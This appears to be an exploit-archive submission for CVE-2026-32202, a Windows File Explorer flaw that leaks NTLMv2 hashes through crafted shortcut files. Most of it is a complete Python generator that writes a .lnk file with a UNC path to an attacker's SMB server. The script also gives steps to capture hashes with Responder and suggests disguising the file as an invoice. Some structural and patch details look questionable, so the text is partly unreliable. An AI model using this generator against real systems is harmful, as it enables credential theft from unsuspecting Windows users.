# Titles: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an
attacker to capture NTLMv2 hashes without user interaction. By crafting a
malicious .lnk (shortcut) file with a UNC path pointing to an
attacker-controlled SMB server, the target's Windows system automatically
sends an NTLMv2 authentication request when the folder containing the .lnk
file is opened. No click on the shortcut is required – simply viewing the
folder triggers the vulnerability.
**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)
**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025
**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
```POST
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```
[+]Exploit:
```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""
import struct
import sys
import os
def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
share_name="share"):
"""
Creates LNK file with UNC path to attacker machine
"""
unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'
# LNK structure (standard + vulnerable component)
lnk = bytearray()
# ===== HEADER (76 bytes) =====
lnk.extend(struct.pack('<I', 0x0000004C)) # HeaderSize
# LinkCLSID: {00021401-0000-0000-C000-000000000046}
lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
lnk.extend(struct.pack('<I', 0x000002A3)) # LinkFlags
(HasName|HasWorkingDir|HasArguments|IsUnicode)
lnk.extend(struct.pack('<I', 0x00000080)) # FileAttributes (NORMAL)
lnk.extend(struct.pack('<Q', 0)) # CreationTime
lnk.extend(struct.pack('<Q', 0)) # AccessTime
lnk.extend(struct.pack('<Q', 0)) # WriteTime
lnk.extend(struct.pack('<I', 0x00001000)) # FileSize
lnk.extend(struct.pack('<I', 0x00000000)) # IconIndex
lnk.extend(struct.pack('<I', 0x00000001)) # ShowCommand (SW_NORMAL)
lnk.extend(struct.pack('<H', 0x0000)) # Hotkey
lnk.extend(b'\x00\x00') # Reserved
lnk.extend(b'\x00\x00\x00\x00') # Reserved2
lnk.extend(b'\x00\x00\x00\x00') # Reserved3
# ===== IDLIST (activates when folder is opened) =====
# Shell Folder IDITEM
lnk.extend(b'\x14\x00') # ItemID size (20 bytes)
lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
lnk.extend(b'\x00\x00') # Terminating ID
# ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
# NameString (UNC path - triggers NTLM hash leak)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ArgumentsString (empty)
lnk.extend(b'\x00\x00')
# WorkingDir (UNC path again)
lnk.extend(struct.pack('<H', len(unc_utf16)))
lnk.extend(unc_utf16)
# ===== Console Properties (required for some Windows versions) =====
lnk.extend(b'\x50\x00\x14\x00') # dwWindowSize (80x20)
lnk.extend(b'\x50\x00\xfa\x00') # dwBufferSize (80x250)
lnk.extend(b'\x00\x00\x00\x00') # dwFontSize
lnk.extend(b'\x00\x00\x00\x00') # dwFontFamily
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameLen
lnk.extend(b'\x00\x00\x00\x00') # dwFaceNameOffset
lnk.extend(b'\x00\x00\x00\x00') # dwStyle
# 64 bytes padding
lnk.extend(b'\x00' * 64)
# Save the file
with open(output_file, 'wb') as f:
f.write(lnk)
return output_file, unc_path
def main():
print(r"""
╔═══════════════════════════════════════════╗
║ CVE-2026-32202 - LNK Generator ║
║ Author: nu11secur1ty ║
╚═══════════════════════════════════════════╝
""")
if len(sys.argv) < 2:
print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP>
[output_file]")
print("Example: python3 cve_2026_32202_gen.py 192.168.1.100
invoice.lnk")
sys.exit(1)
attacker_ip = sys.argv[1]
output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"
lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)
print(f"[+] Exploit ready!")
print(f"[+] File: {lnk_file}")
print(f"[+] UNC path: {unc_path}")
print()
print("[*] Next steps:")
print(f" 1. Start Responder: sudo responder -I eth0 -v")
print(f" 2. Transfer {lnk_file} to Windows 11 Desktop")
print(f" 3. Open Desktop in File Explorer (no click required)")
print(f" 4. Watch Responder - NTLM hash will appear")
print()
with open("start_responder.sh", "w") as f:
f.write("#!/bin/bash\n")
f.write("echo \"[+] Starting Responder...\"\n")
f.write("sudo responder -I eth0 -v\n")
os.chmod("start_responder.sh", 0o755)
print("[+] Helper script created: start_responder.sh")
if __name__ == "__main__":
main()
```
Demo:
[href](https://www.patreon.com/posts/cve-2026-32202-159362448)
Code:
[code](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)
Time spent:
02:30:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty https://www.asc3t1c-nu11secur1ty.com/
On Wed, May 27, 2026 at 2:06 PM Offsec Exploits <
submit@offensive-security.com> wrote:
> Hello,
>
> Thank you for your submission.
> We will be checking it shortly.
>
> Regards
> - Exploit-DB Team
>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Credits and Partners
All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
